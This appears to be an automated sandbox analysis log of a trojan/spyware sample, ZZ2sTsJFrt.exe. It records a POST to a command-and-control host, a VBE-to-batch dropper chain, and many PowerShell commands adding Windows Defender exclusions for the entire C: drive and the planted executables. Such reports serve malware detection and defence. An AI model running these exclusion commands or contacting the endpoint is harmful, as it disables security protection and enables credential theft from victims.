                                    Source: unknown | HTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 048038cm.renyash.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe | Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe | Code function: 0_2_00F06FAA: __EH_prolog, _wcslen, _wcslen, CreateFileW, CloseHandle, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW
                                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: String function: 00F1EC50 appears 56 times
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: String function: 00F1F5F0 appears 31 times
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: String function: 00F1EB78 appears 39 times
Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681656180.000000000318A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs ZZ2sTsJFrt.exe
Source: ZZ2sTsJFrt.exe, 00000000.00000002.1682440714.000000000318A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs ZZ2sTsJFrt.exe
Source: ZZ2sTsJFrt.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs ZZ2sTsJFrt.exe
Source: ZZ2sTsJFrt.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HyperPortContainerproviderinto.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AaHCyFZRuOMjGDqdgJ.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dasHost.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AaHCyFZRuOMjGDqdgJ.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AaHCyFZRuOMjGDqdgJ.exe1.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AaHCyFZRuOMjGDqdgJ.exe2.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@74/341@2/2
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F06C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Code function: 0_2_00F1A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File created: C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe File created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-cgzjbH04kjspqA3ekPHR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8300:120:WilError_03
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe File created: C:\Users\user\AppData\Local\Temp\5lJ5SP1bed
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Command line argument: sfxname 0_2_00F1DF1E
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Command line argument: sfxstime 0_2_00F1DF1E
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Command line argument: STARTDLG 0_2_00F1DF1E
Source: ZZ2sTsJFrt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZZ2sTsJFrt.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AswWpn6hP1.46.dr, QVXBnSKQUm.46.dr, R6d8d7j4J7.46.dr, yBHFK1qDN9.46.dr, iKJkaEAGEb.46.dr, LFlGO8ryoD.46.dr, G7DVfGrqLy.46.dr, GoWrFNObvp.46.dr, OVXgbAnMQJ.46.dr, iyZ8Grc2Dj.46.dr, caxQXYryr3.46.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ZZ2sTsJFrt.exe ReversingLabs: Detection: 70%
Source: ZZ2sTsJFrt.exe Virustotal: Detection: 52%
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe File read: C:\Users\user\Desktop\ZZ2sTsJFrt.exe
Source: unknown Process created: C:\Users\user\Desktop\ZZ2sTsJFrt.exe "C:\Users\user\Desktop\ZZ2sTsJFrt.exe"
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: sppc.dllJump to behavior
